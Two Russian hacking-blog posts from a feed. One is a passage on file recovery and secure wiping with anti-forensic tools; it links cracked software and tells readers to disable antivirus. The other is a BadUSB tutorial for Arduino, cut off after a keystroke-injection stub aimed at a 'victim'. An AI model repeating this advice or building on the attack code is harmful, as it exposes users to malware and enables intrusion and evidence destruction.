  &lt;p id=&quot;K5b2&quot;&gt;Жесткий диск (это то куда вы качаете с торрента репаки и майнеры) хранит в себе информацию по блокам. Все блоки представляют собой файловую систему, в которой хранится метаинформация и данные. А ещё в нем есть таблица разделов.&lt;/p&gt;
  &lt;p id=&quot;0Fcq&quot;&gt;Блок - это часть жесткого диска, отвечающая за определенную часть хранения конкретных данных. Например загрузочный блок хранит в себе информацию для загрузчика. При запуске системы именно этот блок считывается компьютером первый, в котором лежит программа и все необходимые для неё данные для успешного запуска системы.&lt;/p&gt;
  &lt;p id=&quot;fz6w&quot;&gt;Метаинформация - это свойства хранимых файлов и папок в данном блоке жесткого диска. Например:&lt;/p&gt;
  &lt;figure id=&quot;uX05&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/8b/84/8b84bfbb-3b17-4e0d-af8f-eb2aafa0fe0d.png&quot; width=&quot;448&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;xUJM&quot;&gt;Помимо этих атрибутов ещё хранится прочая служебная информация о файле/папке для её успешного открытия, например диапазон адресов на которых хранится данный файл (в случае если файл не помещается в один блок). Однако всё это отлично друг от друга в зависимости от типа таблицы разметки.&lt;/p&gt;
  &lt;p id=&quot;s4w2&quot;&gt;Данные - это собственно данные программы.&lt;/p&gt;
  &lt;p id=&quot;MWx7&quot;&gt;Таблица разделов - это по сути та самая загрузочная часть и разделение на томы (диски). Вот таблицы разделов:&lt;/p&gt;
  &lt;figure id=&quot;vSec&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e4/5d/e45d4be8-789b-4512-bcaa-48f101478e74.png&quot; width=&quot;640&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;9V4g&quot;&gt;MBR - старая загрузочная таблица разделов, работает с BIOS.&lt;/p&gt;
  &lt;p id=&quot;2Bna&quot;&gt;GPT - новая, усовершенствованная система загрузки системы и разделения жесткого диска, работает с UEFI.&lt;/p&gt;
  &lt;p id=&quot;qCSp&quot;&gt;Если у вас старый ПК - вероятно у вас MBR. Если более современный - скорее всего GPT.&lt;/p&gt;
  &lt;p id=&quot;C0Q9&quot;&gt;И последнее, файловая система - это таблица вашего диска, то, как будут храниться ваши данные. Вот они:&lt;/p&gt;
  &lt;figure id=&quot;98fu&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0e/6b/0e6bf506-d1bc-4ee9-9b34-1a7584af160e.png&quot; width=&quot;445&quot; /&gt;
    &lt;figcaption&gt;Файловые системы Linux&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;jbe9&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f8/d7/f8d7cbd0-ecfa-480a-b74b-833c82070ad1.png&quot; width=&quot;656&quot; /&gt;
    &lt;figcaption&gt;Файловые системы Windows&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;7BPX&quot;&gt;Правда про удаление файлов&lt;/h3&gt;
  &lt;p id=&quot;H9Xd&quot;&gt;И так, из теории выше следует вычленить несколько моментов:&lt;/p&gt;
  &lt;ol id=&quot;iwlx&quot;&gt;
    &lt;li id=&quot;6iKE&quot;&gt;Загрузочный раздел - оттуда можно получить инфу о вашей системе и в теории поискать изъяны. Рекомендую зашифровать загрузочный раздел, например использовав &lt;a href=&quot;https://habr.com/ru/articles/558254/&quot; target=&quot;_blank&quot;&gt;VeraCrypt&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;2fhf&quot;&gt;Файловая система - от неё зависит как будут храниться наши данные на жестком диске&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;vHdQ&quot;&gt;Теперь вернемся к тому как майоры смотрят чужие домашние фильмы. &lt;/p&gt;
  &lt;p id=&quot;raJa&quot;&gt;Всё дело в удалении информации с жесткого диска.&lt;/p&gt;
  &lt;p id=&quot;kH2P&quot;&gt;Представьте, мы впервые устанавливаем винду/линукс на наш новенький жесткий диск (хотя он может и не новенький на самом деле). Первым делом мы его форматируем - то есть мы берем свою школьную тетрадь, стираем с неё все линии и выбираем, как будем её размечать: в клеточку; прописью; широкой прописью и так далее, в зависимости от того для какого предмета мы будем её использовать. Про красную линию само собой не забываем. Вот в жёстком диске всё точно также.&lt;/p&gt;
  &lt;p id=&quot;J7Ya&quot;&gt;Окей, мы отформатировали диск, накатили систему, проги, документы и так далее.&lt;/p&gt;
  &lt;p id=&quot;9nXU&quot;&gt;Теперь важный момент про хранение и работы с хранимой на жестком диске инфой. Информация которая записывается на жёсткий диск, записывается в определенные блоки, каждый из которых разделен на ячейки по некоторое количество бит (в зависимости от выбранной файловой системы). И далее на нашем пк создается этот файл который мы можем открыть. Но на самом деле мы видем не наш файл с данными, а ссылку на адрес, в котором хранится информация о том, в каких блоках и ячейках хранится наш файл.&lt;/p&gt;
  &lt;p id=&quot;oWrJ&quot;&gt;Понимаю, сложно, давайте вернемся к нашей тетради. Представьте, что вы разметили вашу тетрадь допустим в клеточку и ещё пронумеровали каждую страницу и каждую в ней строчку. И вот вы на какой-то случайно выбранной странице записали решение некого уравнения. Чтобы вам долго не искать где вы его сохранили, вы у себя на первой странице написали название этого уравнения и адрес (страницу и номер строчки) где вы написали его решение. Вот так если совсем по простому работает жёсткий диск. На самом деле мы оставляем себе несколько главных страниц, и отступив место начинаем сплошным текстом писать решения уравнений, а на главных страницах мы пишем название и прочую полезную информацию (метаинформация), номер страницы, номер строки, номер клетки начала нашего решения уравнения и номер окончания нашего решения уравнения, чтобы не спутать с другими данными.&lt;/p&gt;
  &lt;p id=&quot;HheY&quot;&gt;А что происходит когда мы удаляем наш файл?&lt;/p&gt;
  &lt;p id=&quot;jBGX&quot;&gt;В таком случае происходит удаление не самих данных где записано наше решение уравнение, а ссылка на то, где это решение находится. То есть мы просто удаляем инфу о том, на какой странице, строчке, с какой там по счёту клеточки и до какой клетки мы записали решение уравнения (ибо мы храним инфу сплошняком без пробелов для экономии места на диске, а на главной странице просто пишем как из этого беспорядочного текста найти то что нам надо).&lt;/p&gt;
  &lt;p id=&quot;ezQ9&quot;&gt;И как вы понимаете, в этом и кроется вся лазейка - всё что нам надо, это определить файловую систему, таблицу разделов и то, каким образом происходит запись на диск. Так и работают программы для восстановления данных.&lt;/p&gt;
  &lt;p id=&quot;NOOY&quot;&gt;Например попробуйте восстановить ваши удаленные в корзине файлы с помощью &lt;a href=&quot;https://www.auslogics.com/en/software/file-recovery/&quot; target=&quot;_blank&quot;&gt;Auslogics File Recovery&lt;/a&gt; - скачать крякнутую версию можно &lt;a href=&quot;https://t.me/hunterghoulchat/89&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt; (предварительно отключите АВ на случай блокировки процедуры восстановления удаленных файлов).&lt;/p&gt;
  &lt;figure id=&quot;0m3y&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/10/35/103549ef-7697-4306-8250-2aedfa72242d.png&quot; width=&quot;1357&quot; /&gt;
    &lt;figcaption&gt;Пример нахождения удаленной программы UFED 4PC.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4j92&quot;&gt;Как мы видим, просканировав диск D мы нашли удаленные данные которые можем восстановить, хотя в корзине мы и ничего не смогли найти полезного.&lt;/p&gt;
  &lt;h3 id=&quot;tLQA&quot;&gt;Удаление файлов без восстановления&lt;/h3&gt;
  &lt;p id=&quot;xBoP&quot;&gt;Всё в той же выше программе мы слева в меню можем выбрать различные очистки дисков, которые затерут наши данные нулями.&lt;/p&gt;
  &lt;p id=&quot;UG4q&quot;&gt;Вернемся к нашей тетрадке. Мы удалили информацию о том, где хранится наше уравнение. Но теперь, когда мы знаем все нюансы, мы можем удалить с помощью специальных программ (с помощью ластика) не просто где хранится наше уравнение, но и само его решение, при этом не стерев другие.&lt;/p&gt;
  &lt;p id=&quot;hyKN&quot;&gt;В компуктерах это называется &amp;quot;затереть нулями&amp;quot;. То есть мы переходим по адресу где хранился наш файл, и затираем значения бит (которые образуют в совокупности информацию хранимую в файле) нулями - то есть, ничем. Таким образом полностью стирая файл с &lt;s&gt;лица земли&lt;/s&gt; жесткого диска.&lt;/p&gt;
  &lt;p id=&quot;Gxe3&quot;&gt;Для этого можем также использовать следующие программы:&lt;/p&gt;
  &lt;p id=&quot;9Ejs&quot;&gt;Privazer - скачать &lt;a href=&quot;https://t.me/hunterghoulchat/90%5C&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;.&lt;/p&gt;
  &lt;figure id=&quot;5dkJ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/16/01/160165b4-90fd-49bb-8dcd-88aa96b4dcc0.png&quot; width=&quot;986&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wHIg&quot;&gt;Пожалуй лучшее решение для удаления всех следов из системы. Также присутствует функция бесследного удаления файлов, которые мы ещё не удалили, что гарантирует сразу полное затирание файла без возможности восстановления:&lt;/p&gt;
  &lt;figure id=&quot;Nb9k&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2e/53/2e53d1bf-0027-4008-a5ca-035213311386.png&quot; width=&quot;983&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;6QCi&quot;&gt;BleachBit - вероятно придется качать через VPN. Для винды можно скачать &lt;a href=&quot;https://t.me/hunterghoulchat/91&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;. Для линукса можно скачать на их &lt;a href=&quot;https://www.bleachbit.org/download&quot; target=&quot;_blank&quot;&gt;официальном сайте&lt;/a&gt;.&lt;/p&gt;
  &lt;figure id=&quot;Lij7&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a5/85/a585a599-f81b-4042-b32f-e7eea7d7ec64.png&quot; width=&quot;995&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Q5uq&quot;&gt;Позволяет удалить большой спектр следов. Одно из лучших решений очистки, в том числе если щёлкнуть по иконке очистки также можно удалить файлы и папки с затиранием следов. Просто, удобно, эффективно (а главное бесплатно и бех кряков).&lt;/p&gt;
  &lt;figure id=&quot;eVed&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a9/43/a943d91c-f3bc-4227-b6ad-f0f277cabc6f.png&quot; width=&quot;980&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;UlWd&quot;&gt;USBdeview - единственное рабочее приложение которое я знаю, удаляющее следы подключения к пк всех USB устройств (камеры, телефоны, принтеры и так далее).&lt;/p&gt;
  &lt;figure id=&quot;OwrH&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a3/5a/a35a2bdd-c82d-410e-87c0-d32675771e7d.png&quot; width=&quot;1406&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;AXJL&quot;&gt;Можете зажать левый SHIFT, щелкнуть по самому нижнему файлу для выбора всех подключений. Либо зажать левый CTRL и тыкнуть мышкой по тем, которые мы хотим удалить. Затем нажать на урну (второй значек). Либо на крестик (для извлечения устройств) а затем на урну для удаления следов подключения этого устройства к пк.&lt;/p&gt;
  &lt;p id=&quot;nFFE&quot;&gt;Немного о зеленых строчках:&lt;/p&gt;
  &lt;figure id=&quot;g64E&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b2/cf/b2cf5fd9-ccca-4761-a844-3cb8fd7259ad.png&quot; width=&quot;1408&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Xppp&quot;&gt;Зеленым горит то, что сейчас в данный момент подключено к нашему пк. Так что заранее рекомендую отключить от пк всё то, что вам нужно почистить, а потом зайти в прогу и удалить. Но если это какой-то баг, то опять же - тыкаем на крестик, потом на урну. Должно сработать. Обычно используется данная прога офисными клерками перед проверками регуляторов которые запрещают подключать к пк свой телефон и смотреть там фоточки (но хотя для Сноу Денов тоже подойдет, чтобы замести факт подключения флешки и выкачивания секретных доков ЦРУ).&lt;/p&gt;
  &lt;p id=&quot;kFIA&quot;&gt;Glary Tracks Eraser - скачать можно &lt;a href=&quot;https://www.glarysoft.com/tracks-eraser/&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;. По сути тот же BleachBit с более приятным интерфейсом. Минусы - только под винду и не дает удалить файлы с папками, что ну просто ужас. Подходит для простой очистки следов пользования ПК.&lt;/p&gt;
  &lt;figure id=&quot;xnjV&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/cd/01/cd017a29-a8be-4342-b544-b5bea6e1a6e7.png&quot; width=&quot;1222&quot; /&gt;
    &lt;figcaption&gt;Кажется давно я не выносил мусор...&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;H1JA&quot;&gt;HDD Low Level Format Tool - скачать кряк можно &lt;a href=&quot;https://t.me/hunterghoulchat/93&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;. Эта прога полностью форматирует диск затирая всё нулями. Подходит когда нужно полностью почистить весь диск без возможности восстановления. Если захотите почистить так системный диск, придется загрузиться через флешку с Live-образа и запустить очистку оттуда. ВАЖНО! - Чистит весь физический диск. Т.е. если у вас в пк один жесткий диск и разделен на диск С и D (как это обычно делают в винде) - то эта прога удалит и С и D диск, и загрузочный сектор, и вообще всё что там есть удалит и затрет. Перед использованием отключите АВ, ибо кряк палится антивирусами.&lt;/p&gt;
  &lt;figure id=&quot;9VyX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d3/06/d3065e39-338f-4585-8a7d-c629f501dc00.png&quot; width=&quot;950&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;8fTy&quot;&gt;Вывод&lt;/h3&gt;
  &lt;p id=&quot;9wlf&quot;&gt;Вот в общем то и подошла к концу данная статья. Какие выводы можно сделать из всего выше?&lt;/p&gt;
  &lt;ol id=&quot;b9X8&quot;&gt;
    &lt;li id=&quot;qLAC&quot;&gt;Файлы на самом деле не удаляются с вашего пк, удаляется лишь информация о том где они хранятся. Потом пока вы пользуетесь пк, другая программа может занять эту свободную область памяти и перезаписать собой этот сектор. Но вы уверены что вам так повезет?&lt;/li&gt;
    &lt;li id=&quot;bBbc&quot;&gt;Существуют программы для восстановления удаленных программ. Попробуйте использовать ту что я вам приложил и будете приятно удивлены.&lt;/li&gt;
    &lt;li id=&quot;RoTL&quot;&gt;Существуют методики удаления файлов с затиранием данных и очисткой следов во всех журналах. Пользуйтесь на здоровье&lt;/li&gt;
    &lt;li id=&quot;IoP3&quot;&gt;И последнее САМОЕ ВАЖНОЕ. Если вы храните backup вашей системы (точку восстановления на Windows) - майор просто сможет восстановить вашу порнушку и всё равно посмотреть её вместе со всем УВД под пивом. Так что не забудьте про это)&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;9MPd&quot;&gt;На связи был Hunter Ghoul, берегите свою конфиденциальность, не делитесь с майорами фильмом. Да и вообще не нарушайте закон, тогда и чистить ничего не придется, если вы не силовик и не выполняете свою служебную задачу.&lt;/p&gt;
  &lt;p id=&quot;RyvZ&quot;&gt;Благодарю за прочтение статьи.&lt;/p&gt;

</content></entry><entry><id>hunterghoul_team:arduino-badusb</id><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team/arduino-badusb?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><title>Arduino - свой флиппер за 1000 рублей (делаем BadUSB)</title><published>2024-11-06T12:45:41.139Z</published><updated>2024-11-06T14:18:34.151Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/5e/ef/5eef1e7a-bd03-4abe-9274-26c7954c946e.png"></media:thumbnail><category term="hackware" label="hackware"></category><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/e6/c6/e6c6d1a1-f6bd-4282-b54c-27525d31380b.jpeg&quot;&gt;Дисклеймер: все описанные действия предоставлены автором в ознакомительных целях. Большое спасибо моему товарищу подарившему и научившему азам использования данной прекрасной платы♥</summary><content type="html">
  &lt;figure id=&quot;B4z6&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e6/c6/e6c6d1a1-f6bd-4282-b54c-27525d31380b.jpeg&quot; width=&quot;2508&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;PI4C&quot;&gt;Дисклеймер: все описанные действия предоставлены автором в ознакомительных целях. Большое спасибо моему товарищу подарившему и научившему азам использования данной прекрасной платы♥&lt;/p&gt;
  &lt;h3 id=&quot;JAqp&quot;&gt;Введение&lt;/h3&gt;
  &lt;p id=&quot;FcBF&quot;&gt;Сегодня мы с вами разберем плату Arduino Leonardo - купить можно &lt;a href=&quot;https://www.ozon.ru/category/plata-arduino-leonardo/&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt; (внимание - Китай, подделка, но в принципе работает нормально).&lt;/p&gt;
  &lt;p id=&quot;LWms&quot;&gt;Для сегодняшних манипуляций она более чем подойдет. Более подробно про разные платы можете почитать &lt;a href=&quot;https://alexgyver.ru/arduino-for-newibes/&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt; (VPN maybe required) и &lt;a href=&quot;https://www.ixbt.com/live/topcompile/kakuyu-arduino-vybrat-perechislenie-vseh-plyusov-i-minusov-kazhdoy-platformy.html&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;bLdP&quot;&gt;Arduino служит платой микроконтроллера. По сути это миникомпьютер, к которому можно прицепить нужные тебе модули и сделать полноценный карманно-носимый хакерский гаджет.&lt;/p&gt;
  &lt;p id=&quot;pJN8&quot;&gt;В этой статье мы с вами изучим атаку типа BadUSB с помощью Arduino Leonardo, в котором уже зашита поддержка эмуляции клавиатуры и мыши.&lt;/p&gt;
  &lt;p id=&quot;f2je&quot;&gt;BadUSB - это атака, при которой подключенное к пк устройство распознается как клавиатура или мышь, и дальше исполняет payload (от англ. полезная нагрузка) для запуска вредоносного кода.&lt;/p&gt;
  &lt;h3 id=&quot;rZJn&quot;&gt;Начало программирования с Arduino&lt;/h3&gt;
  &lt;p id=&quot;YKM9&quot;&gt;Для начала нам понадобится:&lt;/p&gt;
  &lt;ol id=&quot;JBq4&quot;&gt;
    &lt;li id=&quot;MJaS&quot;&gt;Плата Arduino Leonardo - купить можно например &lt;a href=&quot;https://www.ozon.ru/category/plata-arduino-leonardo/&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;1hr5&quot;&gt;Программа Arduino IDE - &lt;a href=&quot;https://www.arduino.cc/en/software&quot; target=&quot;_blank&quot;&gt;скачать&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;p4tt&quot;&gt;Возможно type-c провод для подключения платы к пк (если не придет вместе с платой).&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;7wLT&quot;&gt;И так, скачиваем и устанавливаем Arduino IDE.&lt;/p&gt;
  &lt;p id=&quot;9AGn&quot;&gt;Затем вам может потребоваться &lt;a href=&quot;https://voltiq.ru/ch340g-driver-windows-7-10/&quot; target=&quot;_blank&quot;&gt;скачать&lt;/a&gt; и установить драйвер.&lt;/p&gt;
  &lt;p id=&quot;xmBt&quot;&gt;После установки перезагружаем пк, подключаем нашу плату к пк и запускаем прогу.&lt;/p&gt;
  &lt;p id=&quot;BYCN&quot;&gt;Ждем пока прога докачает и установит необходимые библиотеки.&lt;/p&gt;
  &lt;p id=&quot;7mes&quot;&gt;Вся &lt;strong&gt;&lt;u&gt;документация&lt;/u&gt;&lt;/strong&gt; по установке, программированию, библиотекам и прочему - &lt;a href=&quot;https://docs.arduino.cc/&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;I8dF&quot;&gt;Для начала выберем наше устройство в меню подключенных устройств.&lt;/p&gt;
  &lt;figure id=&quot;ag5s&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a4/da/a4da57ec-82a9-4738-b9b2-f5acdcdc96d1.png&quot; width=&quot;764&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Ss80&quot;&gt;Затем зайдем в Tools и выберем следующие настройки&lt;/p&gt;
  &lt;figure id=&quot;1EWY&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/21/bf/21bfab11-e453-4e57-8365-3f47534791b2.png&quot; width=&quot;1174&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;V4oc&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/97/7f/977fbf8a-f123-4b62-8c34-6f755da38f09.png&quot; width=&quot;1074&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ZHu5&quot;&gt;И так, после этого наша первичная настройка завершена.&lt;/p&gt;
  &lt;p id=&quot;1gG6&quot;&gt;Перейдем к разбору примера кода с &lt;a href=&quot;https://codeby.net/threads/arduino-ehto-ehlektronnyj-konstruktor-i-udobnaja-platforma-bystroj-razrabotki-ehlektronnyx-ustrojstv.57714/&quot; target=&quot;_blank&quot;&gt;codeby&lt;/a&gt;:&lt;/p&gt;
  &lt;figure id=&quot;boXT&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b8/5a/b85af790-c359-47e6-b557-39d840239db4.png&quot; width=&quot;839&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;laeY&quot;&gt;&lt;code&gt;/* Мигание LED&lt;br /&gt;* ----------— * codeby.net&lt;br /&gt;* Включает и выключает светодиод (LED) подсоединенный&lt;br /&gt;* к выходу 13, с интервалом в 1 секунду&lt;br /&gt;*&lt;br /&gt;*/&lt;br /&gt;int ledPin = 13;                        // LED подсоединен к выводу 13&lt;br /&gt;void setup ()&lt;br /&gt;{&lt;br /&gt;pinMode (ledPin, OUTPUT);      // устанавливаем вывод 13 как выход&lt;br /&gt;}&lt;br /&gt;void loop ()&lt;br /&gt;{&lt;br /&gt;digitalWrite (ledPin, HIGH);       // включаем LED&lt;br /&gt;delay (1000);                           // пауза 1 секунда&lt;br /&gt;digitalWrite (ledPin, LOW);       // выключаем LED&lt;br /&gt;delay (1000);                           // пауза 1 секунда&lt;br /&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;U2uR&quot;&gt;Здесь мы с вами подключаемся к нашему LED экрану на 13 выводе и пишем программу, чтобы у нас мигала лампочка каждую секунду (5 сек решил долго будет).&lt;/p&gt;
  &lt;p id=&quot;vesE&quot;&gt;В void setup мы задаем как бы построчное исполнение программы, как в том же python условно говоря.&lt;/p&gt;
  &lt;p id=&quot;Wg2J&quot;&gt;В void loop мы задаем также построчно программу, но это уже что-то вроде зацикленного цикла типа While True, так что здесь код будет постоянно повторяться вновь и вновь, что нам и нужно для того чтобы не писать самим бесконечный цикл на мигание лампочки.&lt;/p&gt;
  &lt;p id=&quot;wlx3&quot;&gt;Кстати если мы зайдем в File &amp;gt; Examples то увидим большое количество примеров кода, тыкнув на который у нас подгрузится готовый код. Мы его можем зашить в нашу плату и проверить работу, а также ознакомиться с самим кодом.&lt;/p&gt;
  &lt;figure id=&quot;GQwQ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7a/d8/7ad8ca56-35e7-4efa-93d9-088105667ab6.png&quot; width=&quot;897&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;CYJG&quot;&gt;Так вот. Для того чтобы прошить наш код, нажимаем сочетания клавиш ctrl+R (компиляция и проверка кода). Если всё прошло без ошибок, то ctrl+U - это прошивка программы в нашу плату.&lt;/p&gt;
  &lt;p id=&quot;jdOz&quot;&gt;Пробуем, жмем ctrl+R:&lt;/p&gt;
  &lt;figure id=&quot;OUZu&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/ce/d5/ced525ff-60ac-4445-85ca-5e7748b684ba.png&quot; width=&quot;1919&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;CX4C&quot;&gt;Компиляция успешна, жмем ctrl+U&lt;/p&gt;
  &lt;figure id=&quot;ninh&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/22/cb/22cb63cd-fa6e-4f35-9054-4db23af4eec2.png&quot; width=&quot;1919&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;OcYo&quot;&gt;На китайской плате выдаёт такую ошибку, но это &lt;s&gt;рукожопость&lt;/s&gt; недостаток самих плат собранных в подвале на коленке. Программа должна работать, проверьте, мигает ли у вас светодиод.&lt;/p&gt;
  &lt;p id=&quot;PZKm&quot;&gt;Мы можем изменить время включения и выключения лампочки, поменяв значение в &lt;code&gt;delay (1000)&lt;/code&gt; на своё. Обратите внимание, значение даётся в миллисекундах.&lt;/p&gt;
  &lt;p id=&quot;VIX3&quot;&gt;Например поставим включенный светодиод на 1 сек, а выключенный на 0.5 сек:&lt;/p&gt;
  &lt;figure id=&quot;BQlR&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/7c/12/7c12f5fa-3a44-410b-83ce-24a881b681c9.png&quot; width=&quot;1919&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;pN9z&quot;&gt;Теперь у нас как-бы светодиод будет подмигивать, то есть быть дольше во включенном состоянии, моргая на пол секунды. Можно сделать наоборот чтобы было что-то вроде моргания пожарной сигнализации, поменяв значения местами. Вообщем, развелкайтесь).&lt;/p&gt;
  &lt;p id=&quot;koDn&quot;&gt;Кстати код достаточно понятный, например в &lt;code&gt;digitalWrite ()&lt;/code&gt; видно, что значение &lt;code&gt;HIGH&lt;/code&gt; отвечает за включение светодиода, а &lt;code&gt;LOW&lt;/code&gt; за его выключение.&lt;/p&gt;
  &lt;p id=&quot;BX2l&quot;&gt;Обратите внимание!&lt;/p&gt;
  &lt;p id=&quot;lvYI&quot;&gt;После объявление глобальной функции void setup или void loop идёт следующий синтаксис:&lt;/p&gt;
  &lt;ol id=&quot;94x6&quot;&gt;
    &lt;li id=&quot;3UQV&quot;&gt;Открываются вот такие скобки {}&lt;/li&gt;
    &lt;li id=&quot;Gb98&quot;&gt;Внутри них пишется на одной строчке команда.&lt;/li&gt;
    &lt;li id=&quot;PoPD&quot;&gt;Если это функция, то значение через пробел пишутся в таких скобках () и отделяются между собой запятой&lt;/li&gt;
    &lt;li id=&quot;lnoI&quot;&gt;Каждая строчка заканчивается точкой с запятой ;&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;ZlCr&quot;&gt;Ну вот в общем то и всё, пойдемте тестить badusb код.&lt;/p&gt;
  &lt;h3 id=&quot;CQXb&quot;&gt;Простой BadUSB без цикла&lt;/h3&gt;
  &lt;p id=&quot;EZb1&quot;&gt;Разберём простой код:&lt;/p&gt;
  &lt;figure id=&quot;kvjS&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/20/b6/20b62c64-b5ac-4571-b585-7d59934f9668.png&quot; width=&quot;1919&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;MRN5&quot;&gt;&lt;code&gt;#include &amp;lt;Keyboard.h&amp;gt;&lt;br /&gt;void setup() {&lt;br /&gt;  Keyboard.begin();&lt;br /&gt;  delay(2000);&lt;br /&gt;  Keyboard.press(KEY_LEFT_GUI);&lt;br /&gt;  Keyboard.press(&amp;#x27;r&amp;#x27;);&lt;br /&gt;  delay(50);&lt;br /&gt;  Keyboard.releaseAll();&lt;br /&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;82wz&quot;&gt;&lt;code&gt;void loop() {&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;TPkH&quot;&gt;&lt;code&gt;}&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;5dDH&quot;&gt;Такой простой код запустит на компьютере жертвы при подключении нашей платы программу Выполнить, встроенную в Windows.&lt;/p&gt;
  &lt;p id=&quot;g36Z&quot;&gt;Разберем что здесь написано:&lt;/p&gt;
  &lt;ol id=&quot;eV1p&quot;&gt;
    &lt;li id=&quot;ffJY&quot;&gt;&lt;code&gt;#include &amp;lt;Keyboard.h&amp;gt;&lt;/code&gt; - подключает библиотеку по работе с клавиатурой. &lt;a href=&quot;https://github.com/arduino-libraries/Keyboard/blob/master/src/Keyboard.h&quot; target=&quot;_blank&quot;&gt;Документация&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;KMfL&quot;&gt;&lt;code&gt;Keyboard.begin();&lt;/code&gt; - инициализирует библиотеку. Наша плата начинает эмулировать клавиатуру.&lt;/li&gt;
    &lt;li id=&quot;M2nC&quot;&gt;&lt;code&gt;delay(2000);&lt;/code&gt; - даём паузу 2 секунды чтобы всё прогрузилось&lt;/li&gt;
    &lt;li id=&quot;2GWm&quot;&gt;&lt;code&gt;Keyboard.press(KEY_LEFT_GUI);&lt;/code&gt; - кнопка левого виндовс (или комманд если macos и т.д.)&lt;/li&gt;
    &lt;li id=&quot;aQlh&quot;&gt;&lt;code&gt;Keyboard.press(&amp;#x27;r&amp;#x27;);&lt;/code&gt; - кнопка r&lt;/li&gt;
    &lt;li id=&quot;5ZhQ&quot;&gt;&lt;code&gt;delay(50);&lt;/code&gt; - примерное время в 50 мсек, чтобы кнопки успели нажаться системой&lt;/li&gt;
